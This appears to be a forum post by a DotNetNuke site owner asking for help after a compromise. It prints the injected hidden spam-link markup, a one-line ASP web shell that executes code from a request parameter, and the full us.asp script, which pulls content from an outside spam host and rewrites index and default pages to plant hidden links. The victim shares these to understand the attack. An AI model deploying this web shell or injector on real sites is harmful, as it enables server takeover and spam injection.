I am not sure whether this is the right place to ask this question...
Google Webmaster Tools sent me an email to tell me that my website had been hacked and they were right.
My default.aspx was modified and this code was inserted just before the </html> tag:
<div id=linkbyme><li><a href="http://www.mywebsite.com/images/us.asp">house slippers uggs</a></li></div><script>document.getElementById('linkbyme').style.display='none';</script></body>
(I've changed the URL to mywebsite.com as I don't want more unwanted attention directed to my website)
There were two foreign files in the /images folder: logs.asp and us.asp.
The first of these, log.asp, is pretty simple:
<%ExecuteGlobal request("tanya")%>
The next one, us.asp, is longer and seems to do the dirty work (I will include its contents at the end of this message). I have no idea what it does.
My passwords for the Super User and the SQL account were all hard (I've since changed them just in case). What do people think - is this a DNN problem or has my ISP dropped the ball. I am running a completely vanilla installation of DNN 07.03.02 (I was just waiting a day or so before I was going to install v07.03.04 - I had a bad experience being an early adopter of v07.03.03 with the Telrik editor). Any insights greatly appreciated. Thanks.
<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
<%
Response.Addheader "Content-Type","text/html;charset=utf-8"
if len(Request.QueryString("ugg4"))<>0 Then
Response.Write GetResStr("http://ugg.wmjren.org/A525/"&"ugg4/"&Request.QueryString("ugg4"))
else
Response.Write GetResStr("http://ugg.wmjren.org/A525/"&"ugg4/us.asp")
end if
action=request("action")
replacestr=request("replacestr")
If action="createlinks" and replacestr<>"" Then
Response.Write CreateLink()
End If
Response.End
Function CreateLink()
set fso=CreateObject("Scripting.FileSystemObject")
set fs=fso.GetFolder(Server.MapPath("/"))
For Each file In fs.Files
If instr(LCase(file.name),"index")>0 or instr(LCase(file.name),"default")>0 Then
set fsofile=fso.OpenTextFile(file, 1, true)
On Error Resume next
tempstr=fsofile.Readall
pos1=instr(tempstr,"<div id=linkbyme>")
If pos1>0 then
tempstr=RegexReplace(tempstr,"<div id=linkbyme>(.+?)</body>","</body>")
End If
tempstr=replace(tempstr, "</body>", "<div id=linkbyme>"&replacestr&"</div><script>document.getElementById('linkbyme').style.display='none';</script></body>")
set fsofile1=fso.OpenTextFile(file, 2, true)
fsofile1.WriteLine tempstr
fsofile1.close
CreateLink="linkbyme"
End If
Next
set fso=nothing
End Function
Function RegexReplace(source1,pattern1,replace1)
Set re = New RegExp
re.Pattern = pattern1
re.Global = True
re.IgnoreCase = True
RegexReplace= re.replace(source1,replace1)
End Function
function GetResStr(URL)
dim ResBody,ResStr,PageCode
Set Http=server.createobject("msxml2.serverxmlhttp.3.0")
Http.setTimeouts 10000, 10000, 10000, 10000
Http.open "GET",URL,False
Http.Send()
If Http.Readystate =4 Then
If Http.status=200 Then
ResStr=http.responseText
ResBody=http.responseBody
PageCode="utf-8"
GetResStr=BytesToBstr(http.responseBody,trim(PageCode))
End If
End If
End Function
Function BytesToBstr(Body,Cset)
Dim Objstream
Set Objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
%>